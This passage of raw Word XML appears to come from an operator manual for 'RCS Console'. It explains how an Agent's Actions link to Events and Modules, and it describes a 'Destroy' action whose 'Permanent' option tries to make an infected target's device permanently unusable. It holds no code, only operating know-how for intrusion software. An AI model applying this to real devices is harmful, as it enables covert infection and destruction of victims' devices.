                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0033183C" w:rsidRPr="00A52C9B" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">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Add Action (Destroy)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1223" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:184.5pt;z-index:251819008;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId132" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1223" DrawAspect="Content" ObjectID="_1446455391" r:id="rId287"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0033183C" w:rsidRDefault="0033183C" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0033183C" w:rsidRPr="008C6F2E" w:rsidRDefault="0033183C" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0033183C" w:rsidRPr="008C6F2E" w:rsidRDefault="0033183C" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0033183C" w:rsidRPr="008C6F2E" w:rsidRDefault="0033183C" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRPr="008C6F2E" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0033183C" w:rsidRPr="008C6F2E" w:rsidRDefault="0033183C" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRPr="008C6F2E" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0033183C" w:rsidRPr="008C6F2E" w:rsidRDefault="0033183C" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Permanent</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows the Agent to try to make the infected Target’s device permanently unusable.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0033183C" w:rsidRPr="008C6F2E" w:rsidRDefault="0033183C" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0033183C" w:rsidRDefault="0033183C" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6F2E" w:rsidRDefault="008C6F2E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between Actions and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Events</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> done through the connection points “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable events</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disable events</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The “Enable events” connection is represented by a green arrow. The “Disable events” connection is represented by a red arrow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D326B" w:rsidRPr="004B1CEA" w:rsidRDefault="001D326B" w:rsidP="005F512E">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5F512E" w:rsidRPr="004B1CEA" w:rsidTr="00424FFC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="502C0493" wp14:editId="43B866B3">
                  <wp:extent cx="1619250" cy="2428875"/>
                  <wp:effectExtent l="0" t="0" r="0"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19250" cy="2428875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1448BF11" wp14:editId="45D6A114">
                  <wp:extent cx="1619250" cy="2428875"/>
                  <wp:effectExtent l="0" t="0" r="0" b="952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19250" cy="2428875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidTr="00424FFC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00057420" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRDefault="00732ABF" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.21</w:t>
            </w:r>
            <w:r w:rsidR="005F512E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F512E" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="005F512E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">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5F512E" w:rsidRPr="008438CE" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ENABLE EVENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00057420" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRDefault="00732ABF" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.22</w:t>
            </w:r>
            <w:r w:rsidR="005F512E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F512E" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="005F512E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">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5F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DISABLE EVENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00023759" w:rsidRDefault="00023759" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00023759" w:rsidRDefault="00023759" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between Actions and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> done through the connection points “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stop</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The “Start” connection is represented by a green arrow. The “Stop” connection is represented by a red arrow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="005F512E">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5F512E" w:rsidRPr="004B1CEA" w:rsidTr="00424FFC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1CEA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55EE550E" wp14:editId="3341DD4B">
                  <wp:extent cx="2083777" cy="225742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088691" cy="2262748"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1CEA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00D34C9C" wp14:editId="452E9F4A">
                  <wp:extent cx="2083570" cy="22572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83570" cy="2257200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidTr="00424FFC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00057420" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRDefault="00732ABF" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.23</w:t>
            </w:r>
            <w:r w:rsidR="005F512E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F512E" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="005F512E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">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5F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>START MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00057420" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRDefault="00732ABF" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.24</w:t>
            </w:r>
            <w:r w:rsidR="005F512E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F512E" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="005F512E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">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5F512E" w:rsidRPr="004B1CEA" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>STOP MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
